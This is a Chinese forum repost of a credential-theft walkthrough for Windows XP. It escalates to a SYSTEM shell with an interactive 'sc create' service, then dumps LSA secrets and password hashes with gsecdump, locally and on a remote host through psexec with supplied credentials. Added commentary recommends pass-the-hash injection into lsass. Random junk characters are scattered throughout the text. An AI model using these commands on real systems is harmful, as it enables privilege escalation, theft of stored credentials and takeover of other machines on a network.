o get a DOS Prompt as NT system:% w1 }) h/ q2 r3 z3 n
, }4 ?' U2 K; S' N6 i% d" xC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
, M3 P. f! X2 V7 E9 z0 W[SC] CreateService SUCCESS
2 d: x9 n/ i B1 H5 D# s& Y) S+ l9 H' U
9 C% W: T! z! MC:\>sc start shellcmdline" Y4 \& }# y- R% Z* D2 W
[SC] StartService FAILED 1053:
) E! L4 G1 L/ ~& m
' v9 g; ~0 @- y; |) ^: nThe service did not respond to the start or control request in a timely fashion.; l# M$ g: m2 L8 o& L& S
+ Q, s. m1 O, f, |' }% V0 i
C:\>sc delete shellcmdline
/ M1 y. W% j; H, M9 U$ `" }[SC] DeleteService SUCCESS! o" Y l6 [; P. Q5 E
/ c, C, I+ c5 p& s" X v: f/ C/ H! g1 K------------6 i* ]/ l7 }2 I* Z7 s( Y* y! L6 ~( O
+ k5 [3 {& \* f1 j% ~$ H. E( G
Then in the new DOS window:+ |% _& e2 a' m5 Z" i
& w) n& d3 f, R6 S
Microsoft Windows XP [Version 5.1.2600]
i; T: Q$ P3 {( u(C) Copyright 1985-2001 Microsoft Corp.. A. ^8 u4 j2 @& Z* B
- l( `/ U# C: _8 [9 r4 ]3 J
C:\WINDOWS\system32>whoami
6 F% f' M5 Q. |NT AUTHORITY\SYSTEM f- p6 M1 r: ~9 `$ {# z
! B _( d" {! h- T
C:\WINDOWS\system32>gsecdump -h
/ n8 {8 C5 B+ N4 }% |+ M+ v/ cgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)/ S' Q9 O( B* U8 l+ {/ W4 `
usage: gsecdump [options]4 o5 U$ K. O, H/ |$ i. U% Q
" c4 {0 G- F- D/ Y# `$ L; Z5 [7 R6 G
options:3 @; i/ q2 A, E- d; H# b* A
-h [ --help ] show help5 ~1 x, a4 X& U% r# p
-a [ --dump_all ] dump all secrets1 D" u6 \. {+ Z2 X% W3 x6 _
-l [ --dump_lsa ] dump lsa secrets/ |# C9 j, G W" Y9 ^! `
-w [ --dump_wireless ] dump microsoft wireless connections8 D3 P/ q& ~* Z$ ~1 U- R
-u [ --dump_usedhashes ] dump hashes from active logon sessions
0 y `- T) e6 c2 b) @-s [ --dump_hashes ] dump hashes from SAM/AD
- E+ |; R, k0 m; C$ p; }5 b2 m4 G$ ~; f% M' E; B' j# A0 K
Although I like to use:) D- U7 X# B: D( r+ v4 z
- O; p- e/ K: O6 i$ \5 v" b
PsExec v1.83 - Execute processes remotely
* `2 ^8 q+ C2 |" Z; ICopyright (C) 2001-2007 Mark Russinovich8 J2 l( ~$ C k4 M3 ^
Sysinternals - 链接标记[url]www.sysinternals.com[/url] \! A! E+ p! M, z# X5 }
. D/ Y9 A% }3 y1 r4 T. w
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT# S6 l, L( J1 {
0 x }5 [1 d% ^to get the hashes from active logon sessions of a remote system.
1 s$ C& ?+ t* D' M2 G, }# R, @8 ]" [8 M9 B& p
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.7 [+ l, {. x+ M- ?5 U' T' ^
3 h7 r4 P5 Z4 K提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.7 @% \4 H4 |, O6 v5 u
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
2 [- `& Y% I4 j
% I2 _3 p- D) T9 ], D7 `我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。& [/ v: e3 `5 a2 q
|
发表于 2012-11-6 21:09:29
收藏
支持
反对